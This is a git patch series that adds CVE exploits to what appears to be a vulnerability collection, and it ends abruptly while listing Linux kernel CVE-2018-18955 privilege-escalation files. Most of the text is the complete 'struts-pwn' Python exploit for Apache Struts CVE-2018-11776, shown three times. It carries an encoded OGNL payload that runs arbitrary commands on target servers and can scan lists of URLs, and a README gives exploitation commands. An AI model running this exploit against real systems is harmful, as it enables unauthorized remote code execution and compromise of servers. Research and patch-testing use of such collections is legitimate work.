From 8a3f8ed13388470ef005ced2a34344e00929a576 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 06:58:47 +0000 Subject: [PATCH 001/109] add cve/apache-Struts/2018/CVE-2018. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- cve/apache-Struts/2018/CVE-2018-11776/README.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/README.md diff --git a/cve/apache-Struts/2018/CVE-2018-11776/README.md b/cve/apache-Struts/2018/CVE-2018-11776/README.md new file mode 100644 index 00000000..e69de29b From 03c517a0b5903d76bd0b2e5c3b652430476a778d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 06:59:37 +0000 Subject: [PATCH 002/109] add cve/apache-Struts/2018. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml diff --git a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml new file mode 100644 index 00000000..e69de29b From b6892e0356a1171fd5cd868e2440f22f436628a0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:02:02 +0000 Subject: [PATCH 003/109] add py MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- .../2018/CVE-2018-11776/struts-pwn.py | 226 ++++++++++++++++++ 1 file changed, 226 insertions(+) create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py diff --git a/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py b/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py new file mode 100644 index 00000000..edbf3c5f --- /dev/null +++ b/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py @@ -0,0 +1,226 @@ +#!/usr/bin/env python3 +# coding=utf-8 +# ***************************************************** +# struts-pwn: Apache Struts CVE-2018-11776 Exploit +# Author: +# Mazin Ahmed +# This code uses a payload from: +# https://github.com/jas502n/St2-057 +# ***************************************************** + +import argparse +import random +import requests +import sys +try: + from urllib import parse as urlparse +except ImportError: + import urlparse + +# Disable SSL warnings +try: + import requests.packages.urllib3 + requests.packages.urllib3.disable_warnings() +except Exception: + pass + +if len(sys.argv) <= 1: + print('[*] CVE: 2018-11776 - Apache Struts2 S2-057') + print('[*] Struts-PWN - @mazen160') + print('\n%s -h for help.' % (sys.argv[0])) + exit(0) + + +parser = argparse.ArgumentParser() +parser.add_argument("-u", "--url", + dest="url", + help="Check a single URL.", + action='store') +parser.add_argument("-l", "--list", + dest="usedlist", + help="Check a list of URLs.", + action='store') +parser.add_argument("-c", "--cmd", + dest="cmd", + help="Command to execute. (Default: 'id')", + action='store', + default='id') +parser.add_argument("--exploit", + dest="do_exploit", + help="Exploit.", + action='store_true') + + +args = parser.parse_args() +url = args.url if args.url else None +usedlist = args.usedlist if args.usedlist else None +cmd = args.cmd if args.cmd else None +do_exploit = args.do_exploit if args.do_exploit else None + +headers = { + 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)', + # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', + 'Accept': '*/*' +} +timeout = 3 + + +def parse_url(url): + """ + Parses the URL. + """ + + # url: http://example.com/demo/struts2-showcase/index.action + + url = url.replace('#', '%23') + url = url.replace(' ', '%20') + + if ('://' not in url): + url = str("http://") + str(url) + scheme = urlparse.urlparse(url).scheme + + # Site: http://example.com + site = scheme + '://' + urlparse.urlparse(url).netloc + + # FilePath: /demo/struts2-showcase/index.action + file_path = urlparse.urlparse(url).path + if (file_path == ''): + file_path = '/' + + # Filename: index.action + try: + filename = url.split('/')[-1] + except IndexError: + filename = '' + + # File Dir: /demo/struts2-showcase/ + file_dir = file_path.rstrip(filename) + if (file_dir == ''): + file_dir = '/' + + return({"site": site, + "file_dir": file_dir, + "filename": filename}) + + +def build_injection_inputs(url): + """ + Builds injection inputs for the check. + """ + + parsed_url = parse_url(url) + injection_inputs = [] + url_directories = parsed_url["file_dir"].split("/") + + try: + url_directories.remove("") + except ValueError: + pass + + for i in range(len(url_directories)): + injection_entry = "/".join(url_directories[:i]) + + if not injection_entry.startswith("/"): + injection_entry = "/%s" % (injection_entry) + + if not injection_entry.endswith("/"): + injection_entry = "%s/" % (injection_entry) + + injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload. + injection_entry += parsed_url["filename"] + + injection_inputs.append(injection_entry) + + return(injection_inputs) + + +def check(url): + random_value = int(''.join(random.choice('0123456789') for i in range(2))) + multiplication_value = random_value * random_value + injection_points = build_injection_inputs(url) + parsed_url = parse_url(url) + print("[%] Checking for CVE-2018-11776") + print("[*] URL: %s" % (url)) + print("[*] Total of Attempts: (%s)" % (len(injection_points))) + attempts_counter = 0 + + for injection_point in injection_points: + attempts_counter += 1 + print("[%s/%s]" % (attempts_counter, len(injection_points))) + testing_url = "%s%s" % (parsed_url["site"], injection_point) + testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value)) + try: + resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) + except Exception as e: + print("EXCEPTION::::--> " + str(e)) + continue + if "Location" in resp.headers.keys(): + if str(multiplication_value) in resp.headers['Location']: + print("[*] Status: Vulnerable!") + return(injection_point) + print("[*] Status: Not Affected.") + return(None) + + +def exploit(url, cmd): + parsed_url = parse_url(url) + + injection_point = check(url) + if injection_point is None: + print("[%] Target is not vulnerable.") + return(0) + print("[%] Exploiting...") + + payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd) + + testing_url = "%s%s" % (parsed_url["site"], injection_point) + testing_url = testing_url.replace("{{INJECTION_POINT}}", payload) + + try: + resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) + except Exception as e: + print("EXCEPTION::::--> " + str(e)) + return(1) + + print("[%] Response:") + print(resp.text) + return(0) + + +def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit): + if url: + if not do_exploit: + check(url) + else: + exploit(url, cmd) + + if usedlist: + URLs_List = [] + try: + f_file = open(str(usedlist), "r") + URLs_List = f_file.read().replace("\r", "").split("\n") + try: + URLs_List.remove("") + except ValueError: + pass + f_file.close() + except Exception as e: + print("Error: There was an error in reading list file.") + print("Exception: " + str(e)) + exit(1) + for url in URLs_List: + if not do_exploit: + check(url) + else: + exploit(url, cmd) + + print("[%] Done.") + + +if __name__ == "__main__": + try: + main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit) + except KeyboardInterrupt: + print("\nKeyboardInterrupt Detected.") + print("Exiting...") + exit(0) From d1fce0f60480b6711f9f2312a57d0a0c0b8585de Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:03:01 +0000 Subject: [PATCH 004/109] add cve-2018-11776.py MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- .../2018/CVE-2018-11776/cve-2018-11776.py | 226 ++++++++++++++++++ 1 file changed, 226 insertions(+) create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/cve-2018-11776.py diff --git a/cve/apache-Struts/2018/CVE-2018-11776/cve-2018-11776.py b/cve/apache-Struts/2018/CVE-2018-11776/cve-2018-11776.py new file mode 100644 index 00000000..edbf3c5f --- /dev/null +++ b/cve/apache-Struts/2018/CVE-2018-11776/cve-2018-11776.py @@ -0,0 +1,226 @@ +#!/usr/bin/env python3 +# coding=utf-8 +# ***************************************************** +# struts-pwn: Apache Struts CVE-2018-11776 Exploit +# Author: +# Mazin Ahmed +# This code uses a payload from: +# https://github.com/jas502n/St2-057 +# ***************************************************** + +import argparse +import random +import requests +import sys +try: + from urllib import parse as urlparse +except ImportError: + import urlparse + +# Disable SSL warnings +try: + import requests.packages.urllib3 + requests.packages.urllib3.disable_warnings() +except Exception: + pass + +if len(sys.argv) <= 1: + print('[*] CVE: 2018-11776 - Apache Struts2 S2-057') + print('[*] Struts-PWN - @mazen160') + print('\n%s -h for help.' % (sys.argv[0])) + exit(0) + + +parser = argparse.ArgumentParser() +parser.add_argument("-u", "--url", + dest="url", + help="Check a single URL.", + action='store') +parser.add_argument("-l", "--list", + dest="usedlist", + help="Check a list of URLs.", + action='store') +parser.add_argument("-c", "--cmd", + dest="cmd", + help="Command to execute. (Default: 'id')", + action='store', + default='id') +parser.add_argument("--exploit", + dest="do_exploit", + help="Exploit.", + action='store_true') + + +args = parser.parse_args() +url = args.url if args.url else None +usedlist = args.usedlist if args.usedlist else None +cmd = args.cmd if args.cmd else None +do_exploit = args.do_exploit if args.do_exploit else None + +headers = { + 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)', + # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', + 'Accept': '*/*' +} +timeout = 3 + + +def parse_url(url): + """ + Parses the URL. + """ + + # url: http://example.com/demo/struts2-showcase/index.action + + url = url.replace('#', '%23') + url = url.replace(' ', '%20') + + if ('://' not in url): + url = str("http://") + str(url) + scheme = urlparse.urlparse(url).scheme + + # Site: http://example.com + site = scheme + '://' + urlparse.urlparse(url).netloc + + # FilePath: /demo/struts2-showcase/index.action + file_path = urlparse.urlparse(url).path + if (file_path == ''): + file_path = '/' + + # Filename: index.action + try: + filename = url.split('/')[-1] + except IndexError: + filename = '' + + # File Dir: /demo/struts2-showcase/ + file_dir = file_path.rstrip(filename) + if (file_dir == ''): + file_dir = '/' + + return({"site": site, + "file_dir": file_dir, + "filename": filename}) + + +def build_injection_inputs(url): + """ + Builds injection inputs for the check. + """ + + parsed_url = parse_url(url) + injection_inputs = [] + url_directories = parsed_url["file_dir"].split("/") + + try: + url_directories.remove("") + except ValueError: + pass + + for i in range(len(url_directories)): + injection_entry = "/".join(url_directories[:i]) + + if not injection_entry.startswith("/"): + injection_entry = "/%s" % (injection_entry) + + if not injection_entry.endswith("/"): + injection_entry = "%s/" % (injection_entry) + + injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload. + injection_entry += parsed_url["filename"] + + injection_inputs.append(injection_entry) + + return(injection_inputs) + + +def check(url): + random_value = int(''.join(random.choice('0123456789') for i in range(2))) + multiplication_value = random_value * random_value + injection_points = build_injection_inputs(url) + parsed_url = parse_url(url) + print("[%] Checking for CVE-2018-11776") + print("[*] URL: %s" % (url)) + print("[*] Total of Attempts: (%s)" % (len(injection_points))) + attempts_counter = 0 + + for injection_point in injection_points: + attempts_counter += 1 + print("[%s/%s]" % (attempts_counter, len(injection_points))) + testing_url = "%s%s" % (parsed_url["site"], injection_point) + testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value)) + try: + resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) + except Exception as e: + print("EXCEPTION::::--> " + str(e)) + continue + if "Location" in resp.headers.keys(): + if str(multiplication_value) in resp.headers['Location']: + print("[*] Status: Vulnerable!") + return(injection_point) + print("[*] Status: Not Affected.") + return(None) + + +def exploit(url, cmd): + parsed_url = parse_url(url) + + injection_point = check(url) + if injection_point is None: + print("[%] Target is not vulnerable.") + return(0) + print("[%] Exploiting...") + + payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd) + + testing_url = "%s%s" % (parsed_url["site"], injection_point) + testing_url = testing_url.replace("{{INJECTION_POINT}}", payload) + + try: + resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) + except Exception as e: + print("EXCEPTION::::--> " + str(e)) + return(1) + + print("[%] Response:") + print(resp.text) + return(0) + + +def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit): + if url: + if not do_exploit: + check(url) + else: + exploit(url, cmd) + + if usedlist: + URLs_List = [] + try: + f_file = open(str(usedlist), "r") + URLs_List = f_file.read().replace("\r", "").split("\n") + try: + URLs_List.remove("") + except ValueError: + pass + f_file.close() + except Exception as e: + print("Error: There was an error in reading list file.") + print("Exception: " + str(e)) + exit(1) + for url in URLs_List: + if not do_exploit: + check(url) + else: + exploit(url, cmd) + + print("[%] Done.") + + +if __name__ == "__main__": + try: + main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit) + except KeyboardInterrupt: + print("\nKeyboardInterrupt Detected.") + print("Exiting...") + exit(0) From 33150cf6ece6418690f9f6812a084abeb33cf513 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:03:12 +0000 Subject: [PATCH 005/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2018/CVE-2018-11776/struts-pwn.py | 226 ------------------ 1 file changed, 226 deletions(-) delete mode 100644 cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py diff --git a/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py b/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py deleted file mode 100644 index edbf3c5f..00000000 --- a/cve/apache-Struts/2018/CVE-2018-11776/struts-pwn.py +++ /dev/null @@ -1,226 +0,0 @@ -#!/usr/bin/env python3 -# coding=utf-8 -# ***************************************************** -# struts-pwn: Apache Struts CVE-2018-11776 Exploit -# Author: -# Mazin Ahmed -# This code uses a payload from: -# https://github.com/jas502n/St2-057 -# ***************************************************** - -import argparse -import random -import requests -import sys -try: - from urllib import parse as urlparse -except ImportError: - import urlparse - -# Disable SSL warnings -try: - import requests.packages.urllib3 - requests.packages.urllib3.disable_warnings() -except Exception: - pass - -if len(sys.argv) <= 1: - print('[*] CVE: 2018-11776 - Apache Struts2 S2-057') - print('[*] Struts-PWN - @mazen160') - print('\n%s -h for help.' % (sys.argv[0])) - exit(0) - - -parser = argparse.ArgumentParser() -parser.add_argument("-u", "--url", - dest="url", - help="Check a single URL.", - action='store') -parser.add_argument("-l", "--list", - dest="usedlist", - help="Check a list of URLs.", - action='store') -parser.add_argument("-c", "--cmd", - dest="cmd", - help="Command to execute. (Default: 'id')", - action='store', - default='id') -parser.add_argument("--exploit", - dest="do_exploit", - help="Exploit.", - action='store_true') - - -args = parser.parse_args() -url = args.url if args.url else None -usedlist = args.usedlist if args.usedlist else None -cmd = args.cmd if args.cmd else None -do_exploit = args.do_exploit if args.do_exploit else None - -headers = { - 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)', - # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', - 'Accept': '*/*' -} -timeout = 3 - - -def parse_url(url): - """ - Parses the URL. - """ - - # url: http://example.com/demo/struts2-showcase/index.action - - url = url.replace('#', '%23') - url = url.replace(' ', '%20') - - if ('://' not in url): - url = str("http://") + str(url) - scheme = urlparse.urlparse(url).scheme - - # Site: http://example.com - site = scheme + '://' + urlparse.urlparse(url).netloc - - # FilePath: /demo/struts2-showcase/index.action - file_path = urlparse.urlparse(url).path - if (file_path == ''): - file_path = '/' - - # Filename: index.action - try: - filename = url.split('/')[-1] - except IndexError: - filename = '' - - # File Dir: /demo/struts2-showcase/ - file_dir = file_path.rstrip(filename) - if (file_dir == ''): - file_dir = '/' - - return({"site": site, - "file_dir": file_dir, - "filename": filename}) - - -def build_injection_inputs(url): - """ - Builds injection inputs for the check. - """ - - parsed_url = parse_url(url) - injection_inputs = [] - url_directories = parsed_url["file_dir"].split("/") - - try: - url_directories.remove("") - except ValueError: - pass - - for i in range(len(url_directories)): - injection_entry = "/".join(url_directories[:i]) - - if not injection_entry.startswith("/"): - injection_entry = "/%s" % (injection_entry) - - if not injection_entry.endswith("/"): - injection_entry = "%s/" % (injection_entry) - - injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload. - injection_entry += parsed_url["filename"] - - injection_inputs.append(injection_entry) - - return(injection_inputs) - - -def check(url): - random_value = int(''.join(random.choice('0123456789') for i in range(2))) - multiplication_value = random_value * random_value - injection_points = build_injection_inputs(url) - parsed_url = parse_url(url) - print("[%] Checking for CVE-2018-11776") - print("[*] URL: %s" % (url)) - print("[*] Total of Attempts: (%s)" % (len(injection_points))) - attempts_counter = 0 - - for injection_point in injection_points: - attempts_counter += 1 - print("[%s/%s]" % (attempts_counter, len(injection_points))) - testing_url = "%s%s" % (parsed_url["site"], injection_point) - testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value)) - try: - resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) - except Exception as e: - print("EXCEPTION::::--> " + str(e)) - continue - if "Location" in resp.headers.keys(): - if str(multiplication_value) in resp.headers['Location']: - print("[*] Status: Vulnerable!") - return(injection_point) - print("[*] Status: Not Affected.") - return(None) - - -def exploit(url, cmd): - parsed_url = parse_url(url) - - injection_point = check(url) - if injection_point is None: - print("[%] Target is not vulnerable.") - return(0) - print("[%] Exploiting...") - - payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd) - - testing_url = "%s%s" % (parsed_url["site"], injection_point) - testing_url = testing_url.replace("{{INJECTION_POINT}}", payload) - - try: - resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) - except Exception as e: - print("EXCEPTION::::--> " + str(e)) - return(1) - - print("[%] Response:") - print(resp.text) - return(0) - - -def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit): - if url: - if not do_exploit: - check(url) - else: - exploit(url, cmd) - - if usedlist: - URLs_List = [] - try: - f_file = open(str(usedlist), "r") - URLs_List = f_file.read().replace("\r", "").split("\n") - try: - URLs_List.remove("") - except ValueError: - pass - f_file.close() - except Exception as e: - print("Error: There was an error in reading list file.") - print("Exception: " + str(e)) - exit(1) - for url in URLs_List: - if not do_exploit: - check(url) - else: - exploit(url, cmd) - - print("[%] Done.") - - -if __name__ == "__main__": - try: - main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit) - except KeyboardInterrupt: - print("\nKeyboardInterrupt Detected.") - print("Exiting...") - exit(0) From 9a0d8d7708ff8b54b81d1023e44e18e17dc25f9f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:03:24 +0000 Subject: [PATCH 006/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/apache-Struts/2018/CVE-2018-11776/README.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/2018/CVE-2018-11776/README.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/2018/CVE-2018-11776/README.md diff --git a/cve/apache-Struts/2018/CVE-2018-11776/README.md b/cve/apache-Struts/2018/CVE-2018-11776/README.md deleted file mode 100644 index e69de29b..00000000 From 500f948287a0550286caf3427e942c26c1ea9e09 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:03:45 +0000 Subject: [PATCH 007/109] add readme MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- .../2018/CVE-2018-11776/LICENSE.txt | 22 +++++++++ .../2018/CVE-2018-11776/README.md | 48 +++++++++++++++++++ .../2018/CVE-2018-11776/requirements.txt | 1 + 3 files changed, 71 insertions(+) create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/LICENSE.txt create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/README.md create mode 100644 cve/apache-Struts/2018/CVE-2018-11776/requirements.txt diff --git a/cve/apache-Struts/2018/CVE-2018-11776/LICENSE.txt b/cve/apache-Struts/2018/CVE-2018-11776/LICENSE.txt new file mode 100644 index 00000000..017f1bd2 --- /dev/null +++ b/cve/apache-Struts/2018/CVE-2018-11776/LICENSE.txt @@ -0,0 +1,22 @@ +The MIT License (MIT) + +Copyright (c) 2018 Mazin Ahmed + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + diff --git a/cve/apache-Struts/2018/CVE-2018-11776/README.md b/cve/apache-Struts/2018/CVE-2018-11776/README.md new file mode 100644 index 00000000..34ca25d9 --- /dev/null +++ b/cve/apache-Struts/2018/CVE-2018-11776/README.md @@ -0,0 +1,48 @@ +*struts-pwn - CVE-2018-11776 Exploit* +============ + +### An exploit for Apache Struts CVE-2018-11776 ### + + +# **Usage** # + +## Check if the vulnerability exists against a single URL. ## +`python struts-pwn.py --url 'http://example.com/demo/struts2-showcase/index.action'` + +## Check if the vulnerability exists against a list of URLs. ## +`python struts-pwn.py --list 'urls.txt'` + +## Exploit a single URL. ## +`python struts-pwn.py --exploit --url 'http://example.com/demo/struts2-showcase/index.action' -c 'id'` + +## Exploit a list of URLs. ## +`python struts-pwn.py --exploit --list 'urls.txt' -c 'id'` + + +# **Demo** # +![Demo](https://github.com/mazen160/public/raw/master/static/images/struts-pwn_CVE-2018-11776_Demo.gif) + +![Screenshot 1](https://github.com/mazen160/public/raw/master/static/images/struts-pwn_CVE-2018-11776_Screenshot_1.png) + +![Screenshot 2](https://github.com/mazen160/public/raw/master/static/images/struts-pwn_CVE-2018-11776_Screenshot_2.png) + + +# **Requirements** # +* Python2 or Python3 +* requests + + +# **Legal Disclaimer** # +This project is made for educational and ethical testing purposes only. Usage of struts-pwn for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. + + +# **License** # +The project is licensed under MIT License. + + +# **Author** # +*Mazin Ahmed* +* Website: [https://mazinahmed.net](https://mazinahmed.net) +* Email: *mazin AT mazinahmed DOT net* +* Twitter: [https://twitter.com/mazen160](https://twitter.com/mazen160) +* Linkedin: [http://linkedin.com/in/infosecmazinahmed](http://linkedin.com/in/infosecmazinahmed) diff --git a/cve/apache-Struts/2018/CVE-2018-11776/requirements.txt b/cve/apache-Struts/2018/CVE-2018-11776/requirements.txt new file mode 100644 index 00000000..f2293605 --- /dev/null +++ b/cve/apache-Struts/2018/CVE-2018-11776/requirements.txt @@ -0,0 +1 @@ +requests From 77d85ad515e76c7edb87d494647011137fe3906c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 07:09:19 +0000 Subject: [PATCH 008/109] update cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- .../2018/yaml/CVE-2018-11776.yaml | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml index e69de29b..d66c1fe0 100644 --- a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml +++ b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml @@ -0,0 +1,20 @@ +id: CVE-2018-11776 +source: https://github.com/mazen160/struts-pwn_CVE-2018-11776 +info: + name: Apache Struts是一个用于构建基于Java的web应用程序的模型-视图-控制器(MVC)框架。 + severity: high + description: + Apache Struts 版本 2.3 到 2.3.34 和 2.5 到 2.5.16 在 alwaysSelectFullNamespace 为 true 时(由用户或像 Convention 插件这样的插件)遭受可能的远程代码执行,然后: 结果在没有命名空间的情况下使用,同时,它的上层包没有或通配符命名空间,类似于结果,当使用没有设置值和操作的 url 标签时,同样的可能性同时, 它的上层包没有或通配符命名空间。 + scope-of-influence: + Struts 2.3.1 - Struts 2.3.34 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-11776 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2018-11776 + cwe-id: CWE-20 + cnvd-id: None + kve-id: None + tags: + - 远程命令执行 \ No newline at end of file From 1f303c8bb3aaeb378eed9ea18549fd09e9f2f370 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E5=A8=81=E7=BF=B0?= Date: Fri, 7 Apr 2023 09:18:02 +0000 Subject: [PATCH 009/109] update other_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李威翰 --- other_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/other_list.yaml b/other_list.yaml index c9f163e3..e96035e2 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -33,6 +33,8 @@ cve: - CVE-2022-22978 apache-commons-text: - CVE-2022-42889 + apache-Struts: + - CVE-2018-11776 unzip: - CVE-2022-0529 django: From b67d7a497c6d7937fb46da3180157815efe78d1a Mon Sep 17 00:00:00 2001 From: guanzhenyu Date: Fri, 7 Apr 2023 16:55:54 +0800 Subject: [PATCH 010/109] Add CVE-2018-18955 --- .../2018/CVE-2018-18955/README.md | 29 ++ .../CVE-2018-18955/exploit.bash_completion.sh | 103 ++++++ .../2018/CVE-2018-18955/exploit.cron.sh | 118 +++++++ .../2018/CVE-2018-18955/exploit.dbus.sh | 162 +++++++++ .../2018/CVE-2018-18955/exploit.ldpreload.sh | 110 ++++++ .../2018/CVE-2018-18955/exploit.polkit.sh | 134 ++++++++ .../2018/CVE-2018-18955/libsubuid.c | 14 + .../2018/CVE-2018-18955/rootshell.c | 9 + .../2018/CVE-2018-18955/subshell.c | 98 ++++++ .../2018/CVE-2018-18955/subuid_shell.c | 322 ++++++++++++++++++ .../2018/yaml/CVE-2018-18955.yaml | 19 ++ openkylin_list.yaml | 1 + 12 files changed, 1119 insertions(+) create mode 100644 cve/linux-kernel/2018/CVE-2018-18955/README.md create mode 100755 cve/linux-kernel/2018/CVE-2018-18955/exploit.bash_completion.sh create mode 100755 cve/linux-kernel/2018/CVE-2018-18955/exploit.cron.sh create mode 100755 cve/linux-kernel/2018/CVE-2018-18955/exploit.dbus.sh create mode 100755 cve/linux-kernel/2018/CVE-2018-18955/exploit.ldpreload.sh create mode 100755 